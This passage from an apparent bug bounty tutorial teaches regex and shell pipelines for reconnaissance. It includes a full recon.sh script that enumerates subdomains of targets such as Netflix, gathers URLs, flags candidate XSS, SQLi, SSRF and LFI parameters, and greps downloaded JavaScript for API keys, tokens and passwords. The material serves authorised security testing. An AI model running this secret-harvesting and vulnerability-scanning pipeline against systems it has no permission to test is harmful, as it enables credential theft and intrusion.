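# Hypothetical rows in the same shape as the jq @tsv output:
printf 'old.example.com\tExample CA\t2024-06-01T00:00:00\n' > /dev/null
printf '%s\t%s\t%s\n' \
  'old.example.com' 'Example CA' '2024-06-01T00:00:00' \
  'new.example.com' 'Example CA' '2025-03-01T00:00:00' |
  names_since '2025-01-01'   # prints: new.example.com
```

Recently issued certificates often point at newly deployed hosts, which tend to be less hardened than long-lived ones.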

The Wayback CDX API is more powerful than waybackurls for large targets. It supports filtering by MIME type, status code, and date range. The collapse=urlkey parameter collapses repeated captures of the same URL into one row, and limit=10000 caps the results. For very large targets like Netflix, you may want to paginate or filter by subdomain.

The GitHub code search API is a passive recon goldmine. Developers push code containing hardcoded credentials, internal hostnames, and API endpoints to public repositories. Code search requires an authenticated request and is rate-limited, so generate a token before using it.

One powerful jq pattern worth memorizing is select() for filtering:

# Only show crt.sh entries issued since 2025-01-01 (adjust the date as needed)
curl -s "https://crt.sh/?q=%.tesla.com&output=json" | jq -r '.[] | select(.not_before > "2025-01-01") | .name_value' | sort -u

The gf Pattern Library

gf is one of the most underrated tools in the bug bounty ecosystem. Created by tomnomnom, it's essentially a wrapper around grep that lets you save and reuse named regex patterns. Instead of remembering a 200-character regex for XSS parameters, you just run gf xss.
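Conceptually, a gf pattern is a saved grep invocation. A hand-rolled equivalent as a shell function might look like the sketch below. The function name redirect_params and the parameter list are a small hypothetical subset for illustration, not gf's actual pattern file.

```shell
# redirect_params: keep URLs that carry a redirect-style parameter.
# The [?&] prefix and trailing = make sure a full parameter name is matched,
# so "curl=" does not count as "url=".
redirect_params() {
  grep -iE '[?&](redirect(_uri|_url)?|return(to)?|next|url|goto|dest(ination)?)='
}

# Hypothetical sample input; only the first and last lines should survive.
printf '%s\n' \
  'https://example.com/login?next=/home' \
  'https://example.com/page?id=5' \
  'https://example.com/a?curl=1' \
  'https://example.com/out?ReturnTo=https://example.org' |
  redirect_params
```

Keeping patterns in named functions or gf files means a fix to one regex improves every pipeline that uses it.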

Full Automated Recon Script

Everything we've covered so far comes together in this script. Save it as recon.sh , make it executable, and run it against any target in scope.

#!/bin/bash

# recon.sh - Full Bug Bounty Recon Pipeline

# Usage: ./recon.sh netflix.com

TARGET=$1

OUT="./recon/$TARGET"

mkdir -p $OUT/{subs,urls,vulns,secrets,js}

echo "[*] Starting recon on $TARGET"

# Passive subs

echo "[*] Subdomain enum…"

subfinder -d $TARGET -silent | anew $OUT/subs/subs.txt

curl -s "https://crt.sh/?q=%.$TARGET&output=json" | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | anew $OUT/subs/subs.txt

# Probe

echo "[*] Probing live hosts…"

cat $OUT/subs/subs.txt | httpx -silent | anew $OUT/subs/live.txt

# URLs

echo "[*] Collecting URLs…"

gau --subs $TARGET | uro | anew $OUT/urls/all.txt

waybackurls $TARGET | uro | anew $OUT/urls/all.txt

katana -list $OUT/subs/live.txt -d 3 -f qurl -silent | uro | anew $OUT/urls/all.txt

# Filter

cat $OUT/urls/all.txt | grep -E '\.(js)$' | anew $OUT/js/files.txt

cat $OUT/urls/all.txt | gf xss | sed 's/=.*/=/' | sort -u > $OUT/vulns/xss.txt

cat $OUT/urls/all.txt | gf sqli | sed 's/=.*/=/' | sort -u > $OUT/vulns/sqli.txt

cat $OUT/urls/all.txt | gf redirect | sed 's/=.*/=/' | sort -u > $OUT/vulns/redirect.txt

cat $OUT/urls/all.txt | gf ssrf | sed 's/=.*/=/' | sort -u >$OUT/vulns/ssrf.txt

cat $OUT/urls/all.txt | gf lfi | sed 's/=.*/=/' | sort -u > $OUT/vulns/lfi.txt

# Secrets in JS

echo "[*] Hunting secrets in JS…"

cat $OUT/js/files.txt | xargs -P5 -I{} curl -sk {} | grep -oP '(api[_-]key|apikey|secret|token|password)\s*[=:]\s*["\x27][a-zA-Z0-9_\-]{16,}["\x27]' | sort -u > $OUT/secrets/js_secrets.txt

# Summary

echo ""

echo "===== RECON SUMMARY ====="

echo "Subdomains: $(wc -l < $OUT/subs/subs.txt)"

echo "Live hosts: $(wc -l < $OUT/subs/live.txt)"

echo "Total URLs: $(wc -l < $OUT/urls/all.txt)"

echo "JS files: $(wc -l < $OUT/js/files.txt)"

echo "XSS candidates: $(wc -l < $OUT/vulns/xss.txt)"

echo "SQLi candidates: $(wc -l < $OUT/vulns/sqli.txt)"

echo "Redirect candidates: $(wc -l < $OUT/vulns/redirect.txt)"

echo "Secrets found: $(wc -l < $OUT/secrets/js_secrets.txt)"

echo "========================="

This script is intentionally modular. Each section is independent: if subfinder is slow, you can comment it out and run only crt.sh. If you're revisiting a target, the anew calls mean re-running the script only adds new findings rather than duplicating existing ones.

The -P5 flag on xargs runs five curl requests in parallel for JS file downloading. Adjust this based on your connection speed and the target's rate limiting. For large programs like Netflix with thousands of JS files, parallel downloading can cut this step from hours to minutes.

Pro Tips & Secrets

These are the techniques that separate hunters who find bugs from hunters who find noise.

\K resets the match start. Instead of grep -oP '(?<=token=)\S+' (which requires a fixed-width lookbehind), use grep -oP 'token=\K\S+'. It's cleaner, more readable, and works with variable-length prefixes.

anew is idempotent. Unlike >> which blindly appends, anew only adds lines that aren't already in the file. This means you can re-run your entire pipeline against a target you've already scanned, and you'll only see new findings. Build this habit from day one.

uro before everything. Before feeding URLs into any tool that makes HTTP requests, run them through uro. Reducing 50,000 URLs to 5,000 unique patterns saves time, reduces noise, and avoids hitting rate limits.

httpx -mc 200 for precision. When you only care about live, accessible endpoints, filter with -mc 200 (match status code 200). This eliminates redirects, 403s, and 404s from your working set.

sort -u is free deduplication. Always sort and deduplicate before feeding data into tools. It costs almost nothing and prevents redundant work downstream.

tee for simultaneous write and pipe. When you want to save output AND pipe it to the next command:

subfinder -d netflix.com | tee subs.txt | httpx -silent

This writes to subs.txt while simultaneously piping to httpx, so there is no need to run subfinder twice.

xargs -P10 for parallelism. Most recon tasks are I/O bound, not CPU bound. Running 10 parallel curl requests is almost always faster than running them sequentially. Adjust the number based on the target's rate limiting.

2>/dev/null to silence errors. In long pipelines, tool errors printed to stderr can clutter your output. Redirect stderr to /dev/null for cleaner results:

cat urls.txt | while read -r url; do curl -sk "$url" 2>/dev/null | grep 'secret'; done

while read for complex per-URL logic. When you need to do multiple operations per URL (extract a parameter, make a request, check the response), a while read loop is cleaner than chaining pipes:

cat urls.txt | while read -r url; do
  # Multiple operations on $url
  :
done

grep -v to exclude noise. CDN URLs, analytics scripts, and tracking pixels pollute your URL lists. Filter them out early:

cat urls.txt | grep -vE '(google-analytics|doubleclick|facebook|twitter|cdn\.cloudflare|jquery\.min\.js)'

Scope your regex to the target. When extracting subdomains, always anchor to the target domain to avoid false positives from unrelated certificates:

grep -oP '[a-zA-Z0-9._-]+\.netflix\.com'

Chain nuclei after gf. The gf patterns give you candidate URLs; nuclei turns candidates into findings you can verify. The combination is powerful:

cat urls.txt | gf sqli | nuclei -t ~/nuclei-templates/vulnerabilities/ -silent

Conclusion

Regex is not optional in modern bug bounty hunting. It is the difference between staring at 50,000 lines of tool output and having a focused list of 20 URLs worth testing manually. Every hour you invest in learning regex pays dividends across every engagement you'll ever run.

The pipelines in this article are starting points, not endpoints. The best hunters customize their gf patterns for the specific technologies they encounter. They build target-specific wordlists from the URL patterns they find. They write scripts that automate the boring parts so they can spend their time on the interesting parts: the manual analysis, the creative chaining of vulnerabilities, the business logic flaws that no automated tool will ever find.

Build your pipeline. Customize your patterns. Automate the noise. Focus on the signal.

Happy hunting. Stay in scope.